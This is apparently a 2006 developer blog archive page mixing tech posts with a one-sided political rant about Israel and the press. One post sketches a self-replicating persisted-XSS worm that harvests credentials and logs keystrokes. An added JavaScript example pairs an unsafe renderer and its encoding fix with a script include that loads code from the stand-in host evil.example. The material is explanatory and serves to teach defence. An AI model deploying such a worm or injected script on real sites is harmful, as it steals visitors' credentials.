November 30, 2006
Test XSS Post
Ignore this post - unless you get a JS popup. In which case your RSS aggregator does NOT have your back.
If you're reading this in a browser (i.e. visiting my blog) and get a popup, you've been pwn3d!!!! (jk)
Posted on November 30, 2006
Self-Replicating XSS Worm
So, I'm working (night and day, and day and night) on a 60-minute AJAX Security presentation that will be used by MSDN presenters to help remind web developers of ... you guessed it: AJAX Security.
But, I think I've been spending a bit too much time contemplating various XSS attack vectors. In fact, partially inspired by "Samy" I've come up with my own sinister plot, and thought I'd share it:
Disaster:
3 Scoops of Exploit, and 1 cup of Negligence: Hacker manages to execute a persisted XSS attack against a site that blindly trusts user input, persists it, and outputs it unencoded to subsequent visitors (a forum site, for example).
2 teaspoons of Malice: Hacker injects a script tag that loads an evil.js file into the vulnerable page, and after harvesting credentials (and possibly logging keystrokes, etc.) executes a nifty function called Replicate(). Replicate is a JS function that checks the referrer of the current page and, if there is one and it points back to the same site, attempts various SILENT exploits against the referring page - requesting it and hunting for other pages, form fields, etc. that might be susceptible to persisted XSS. (It can just use the XmlHttpRequest object to request, parse, and interact with referring pages from the same site: a script included by a page runs with that page's origin, so the same-origin policy doesn't block it from reading and POSTing to anything else on that host - it only walls off other origins.)
Mix Well, and Simmer: If other pages are compromised, the code injected into them will instruct browsers to load the same evil.js file, which will in turn check new referrers and attempt to compromise them.
With any luck, huge chunks of an entire site could be swamped with credential harvesting, keystroke logging, self-replicating evil.... it's like the Borg all over again. (And, I'm sure some evil (or good) genius hacker out there has already coded this pig... I'm just happy I was able to come up with this idea all on my own... )
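The ingredient that makes the whole recipe work is the site echoing stored input straight into HTML. Here's an added example (my own illustration, not code from the post above) of that sink beside the fix, plus the same-origin test the worm depends on before it bothers fetching a referring page. The post data, the evil.example host and the function names are all assumptions made up for the demo.

```javascript
// Added example, not code from the original post. It shows the persisted-XSS
// sink that a worm like the one sketched above needs, the output-encoding fix,
// and the same-origin test the worm relies on before fetching a referring page.
// Names (renderPostUnsafe, evil.example, etc.) are illustrative assumptions.

// Constructed sample data: the worm's bootstrap is just a script include that
// the forum persists and replays to every later visitor.
const WORM_BOOTSTRAP = '<script src="http://evil.example/evil.js"></script>';
const samplePosts = [
  { author: 'alice', body: 'First post!' },
  { author: 'mallory', body: 'Nice site ' + WORM_BOOTSTRAP },
];

// Vulnerable: stored user input concatenated straight into the HTML response.
function renderPostUnsafe(post) {
  return `<div class="post"><b>${post.author}</b>: ${post.body}</div>`;
}

// Fix: encode for the HTML body context at output time. The data stays intact
// in the database; it is the rendering that stops it from becoming markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderPostSafe(post) {
  return `<div class="post"><b>${escapeHtml(post.author)}</b>: ${escapeHtml(post.body)}</div>`;
}

// Crude check used only to compare the two renderings: does the output still
// contain a script element? (Not a defence; pattern-matching after the fact is
// exactly what encoding at the sink replaces.)
function containsScriptElement(html) {
  return /<script\b[^>]*>/i.test(html);
}

// The worm's propagation precondition. A script included by a page runs with
// that page's origin, so XMLHttpRequest may read and POST to any page with the
// same scheme, host and port; other origins are walled off by the same-origin
// policy. An empty or cross-origin referrer gives the worm nothing to attack.
function isSameOrigin(referrerUrl, currentUrl) {
  if (!referrerUrl) return false;
  try {
    const ref = new URL(referrerUrl);
    const cur = new URL(currentUrl);
    // URL.host includes a non-default port, so ports are compared too.
    return ref.protocol === cur.protocol && ref.host === cur.host;
  } catch (_) {
    return false; // unparsable referrer: treat as no referrer
  }
}

// Stand-alone demo.
for (const post of samplePosts) {
  console.log('unsafe :', renderPostUnsafe(post));
  console.log('safe   :', renderPostSafe(post));
}
console.log(isSameOrigin('http://forum.example/thread/42', 'http://forum.example/post.aspx'));
```

Run it with node and compare the two renderings of mallory's post: the unsafe one ships the script include to every visitor, the safe one shows it as harmless text. Note that the fix is per output context; the body-text encoding above is not enough if the same value lands inside a script block or an attribute value.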
Posted on November 30, 2006
November 25, 2006
My Vote for worst documentation this year
One of my favorite jokes:
A Helicopter Tour of Seattle ran into trouble one day as incredibly thick fog made it impossible for the pilots to see anything. Eventually, the pilots had to slow to a crawl, to avoid flying into anything. Finally the helicopter arrived at a large office building. People in the building rushed to the windows to see a helicopter hovering outside in the fog.
Then one of the pilots got an idea: on a piece of paper, in big letters, he wrote: "Where are we?"
Some people in the building rushed to a desk, scribbled something down, then ran back to the window - holding up a big sign. "You are in a Helicopter!" read the sign.
The pilot gave the office-workers a nice smile and a big 'thumbs up' and turned the helicopter a few degrees to the left and began to fly into the fog.
Within 20 minutes the helicopter arrived safely back at the airport without any mishap. Stunned, one of the passengers asked: "How in the world were you able to figure out how to get back to the airport from that idiotic response?"
"Oh, that was simple," said the pilot. "The answer was technically correct, but totally useless - which meant we were at the Microsoft Campus. Once I had that figured out, it was just a question of flying back to base... "
In that spirit, I was looking for some validation that a dedicated SQL Server box should have its "Memory Usage" option set to System cache instead of Programs.
Googling for specifics on this one actually turned out to be a bit harder than I would have anticipated. (Seriously, details on what each option does to the underlying system would be great to have...)
Then I found this gem - I've included a screen cap of it in all of its glory just so you won't have to follow the link:
Tell me that's not awesome documentation. Though I think they forgot to tell you how to click on the OK button... (And don't worry - I checked the links from this page - nothing explained what the POINT of changing these would be.... )
Posted on November 25, 2006
November 21, 2006
RDOS 3.1 Update
So... RDOS 3.1 is still under way. In fact it's code complete. I've just been seriously taking my time testing it. (No, not that I've been testing it THAT well, just taking my time to test it... if you follow my meaning.)
I decided to ditch Virtual Path Provider support, though I'll probably just throw it back in a bit later just for the SubText folks if they still want it. (It's a bit too complex at this point, and not particularly suited to most end users.)
Otherwise, one of the big changes is the addition of rules. Previously RDOS just used filters - patterns that you'd set up in an attempt to block spam. That works pretty well, especially if you've got the time to keep updating them, or are lucky enough to get a single pattern that traps most types of spam. But it doesn't work well when you're just trying to protect certain directories from certain types of traffic. So now RDOS has support for rules - which basically say: "open season on anything that tries to POST to such and such directory". The rules can be pretty complex, but I've found them insanely useful at this point.
In fact, I left my old blog up on AngryPets.com as a type of 'honey-pot' for spammers. Spams against that 'honey-pot' site were coming in at roughly the rate of 500/day. (Weekends were a little worse actually). I just threw up RDOS with a rule against that blog, denying POSTs, and as soon as it went up, my inbox went quiet - no more spams.
I've almost got a whole battery of functional tests (too complex to be considered unit-tests, and they don't test code but outcome) ready for prime-time. Once I've got those done, I'll release them, along with some beta versions of RDOS 3.1...
Thereafter I'll look into doing some stuff catered to SubText, and likely just turn RDOS over as an open-source app...
Posted on November 21, 2006
November 20, 2006
Funniest Blog Post in a While
Here's a funny post for you - one of the best I've seen in a long while...
Posted on November 20, 2006
November 15, 2006
Pffffbbbbbttttt
YOU
HAVE
GOT
TO
BE
KIDDING
ME
When will the world pull its head out of its own ass and wise up? Iran wants the UN to do something to Israel because of 'repeated' threats?
I can't stand it one day longer. Iran threatens every day to wipe Israel off the map. France and Germany are practically CHOMPING at the bit to shoot down Israeli planes attempting to stop Iran/Syria from re-arming Hizbullah with more missiles, but French and German 'Peace Keepers' refuse to operate at night because it's too 'dangerous'? That, and they patently refuse to challenge potential militants/combatants for fear of inciting riots.
Oh, and let's not forget the EXCELLENT press campaign the Palestinians and those bastard terrorists in Lebanon have waged - largely based on their ability to fake/fabricate news that uses outright lies and fabrications to play on western sympathies and make it look like the Israelis are some kind of un-human monsters. Yet this crap goes completely unchecked by the media.
Muhammad al-Dura. The staged blood-libel that started it all.
Pallywood - yet the press laps it up.
The ambulance bombing that never was.
The chemical weapons that never were.
The new Anti-Semitism. (Why we need to worry about attempts to brand Jews/Israelis as sub-human monsters.)
Yet Hizbullah dropped more ordnance on Israel during their latest attack than Hitler managed to put on the British during WW II - yet NO ONE mentions it. Meanwhile, Kassam rockets are actually STILL falling on Israeli soil TODAY and killing people - yet the press only mentions the damage done by those horrible Jews.
So, sorry. I've had it. And I think it's about time for the world to quit being stupid. In fact, everyone say it with me: Hating Jews isn't cool. They are NOT sub-human monsters. No, we don't have to love everything Israel does. But Israel and the Jews are NOT the cause of all of the world's problems.
Posted on November 15, 2006
November 13, 2006
Office 2007 - Definitely worth the upgrade
We all know how much, er... um... complaining I do on this site. Face it, I won't settle for anything less than perfection. And when it comes to Office, I'm totally merciless.
I've been using the Office 2007 Betas off and on over the past month or so, and I've been seriously impressed.
This morning I made the leap, and installed Office 2007 on my main machine. Installation was smoooooth. Functionality is incredible. The eye-candy is PURE sugar (and high-fructose corn syrup).
Words alone will NOT describe how much better Word 2007 is than Word 2003. In fact, while I really wanted to upgrade to 2007 I just didn't have time - and planned on upgrading Wednesday after finishing a huge project I'm working on now. (I'm sick of working on it now, and needed a break.)
But, after 20 minutes of battling Word 2003 on an existing document with HEAVY formatting, I decided that I'd had enough. I had seen enough of Word 2007 to know that some of my most DESPISED bugs were fixed. (For example, if you have a document with a few paragraphs, bulleted lists, headings, etc. in 2003 and do CTRL+A and change the font, when you do a new carriage return under existing content, you'll revert to the old font.... and other WORSE horrors that take too much energy to explain.)
At any rate. I took the leap, and installed Office 2007. Even with the time I lost during the install (which wasn't much), and having to really learn a new interface, I can confidently say that within about 3 hours of working with Office 2007 I'm now MUCH FARTHER ALONG THAN I WOULD BE with Word 2003.
My only complaints (you knew they were coming) are very simple ones (in fact neither of them are really complaints - I just need to keep up the 'Angry' persona... ):
1) In Outlook, just get rid of the Today Page/Display if you're not going to give us any new/cool options to use for formatting that stuff. Is it just me, or is the Today screen useless? (And yeah, this isn't a complaint, it's a nit-pick. More importantly, the To-Do Bar is pwnz0r-ific, and invalidates the need for that stupid Today thingy.)
2) Man...I wish we could have the ribbon toolbars everywhere. I initially thought they were stupid (a long time ago), but I can't believe how well they work. There were a few times today where I really couldn't find options I needed, but then I sat and thought about it, and within 10 seconds I was able to find the options/tools/functionality/etc. The Ribbon Toolbars REALLY do make things much more intuitive. I just wish that OneNote and Outlook got hooked into that Ribbony goodness/love.
Frankly, the whole thing is SHINY. It's by far the best Office Experience I've ever had. It even gave me back a BUNCH of Faith in MS. This is a solid product, I'm also convinced that the user factors (in Word especially) are just brilliant - and more innovative than anything else out there. And from a complaining jerk-wad like me, that's a HUGE compliment - but the Office Team deserves it.
(Maybe we can put together a petition to get the Office Team to give out extra Ribbon love to Outlook and OneNote? Hey, it worked for those pansy VB6 MVPs, and VB6 is so 20th century - this is a modern app. *ducks for cover*.)
Posted on November 13, 2006
November 10, 2006
XP's Virtual Memory Manager can bite me
Hard. Right square in the keister.
I got tired of blowing my box out of RAM (by not having a page file) with all of the Virtual Machines I run. So I turned my paging file back on... thinking "how bad could it be?"
Then out of the blue, while using my box I get that insanely lame: Virtual Memory is too low.. your machine might chug and smoke while we use more of the HD to make it faster.
Faster? By moving memory to disk... ohhhkay.
You idiots do realize that I've got another solid, 1 GB of RAM laying around on my computer - just taking up space? And you're allocating more memory on my drive?
Killer.
Posted on November 10, 2006
Microsoft and HotFixes
I've lived for the past few years in total, abject, fear of hotfixes.
That's only because I've spent nearly an hour on the phone before waiting (after giving out a CC# - that wasn't charged) just to get one before.
But that was then.
Today I NEEDED a hotfix. MS needs to be slapped for not just giving you a number to call on their KB articles/links (seriously, go click the support link in that page...after 3 pages and trying to figure out who/what you are... you'll give up).
Since I couldn't find a good number to call, I just called MS' 1 800 number. The menu-ing system actually worked, and went something like:
... if you want support, press 2... .
... if you are a developer, press 3....
... if you would like a hotfix, press 1 (or 2.. can't remember)....
Then, like that I was connected. They just needed my first and last name, a phone number (in case we got cut off) and an email address. Then they needed the KB #. A brief warning about the nature of HotFixes (if you haven't pulled one down before), then they waited on the phone until the fix showed up in my email.
IMPRESSIVE. The whole thing took less than 7 minutes.
Posted on November 10, 2006
November 09, 2006
AspNetSql Providers and File Access Issues
BIG shout out to fellow ASPInsider Paul Glavich who saved my bacon on this one.
A while back I ran into an issue where membership info that I had saved to the ASPNETDB.mdf in my local site just didn't work after I moved the site to another location (i.e., to a different box). Turns out that since I had made some changes to provider details, and failed to explicitly specify an applicationName attribute, my Providers were all checking for logins/etc. against a different ApplicationId in the SQLEXPRESS database.
Scott Guthrie posted about it a while back.
So, imagine my surprise today when I ran into what seemed like the same thing: I moved my site, fired it up, tried to login, and bupkis. Each time I'd log in, the page would just blink. Seemed to be EXACTLY the same behavior you'd get if your providers didn't explicitly specify an applicationName attribute. Only you can bet your sweet bippy I had explicitly specified that.
After yelling at my computer ("you lie!!!!1111oneoneone"), I posted an email. (Stepping into the debugger I could see that the ApplicationName was indeed being handled correctly, but Membership.ValidateUser() was just never returning true. Worse, I could run copies of this site in VS 2005 and Cassini - I just couldn't run a copy of the site in a different IIS site listening for different headers.) Paul asked if both sites in IIS had the same perms. Well, duh... there it was. I had been so busy focusing on the ApplicationName goodness, that I had totally missed that.
The moral of the story? Actually, there are two:
1) Step away from the computer - rethink, it may not be what you think it is, etc.
2) The ASP.NET SQL Providers need to be SLAPPED for swallowing something HUGE like: "hey, dammit, I can't connect to the friggin' db because access to the 'attachable' SQLEXPRESS db is denied to NETWORK SERVICE."
Posted on November 09, 2006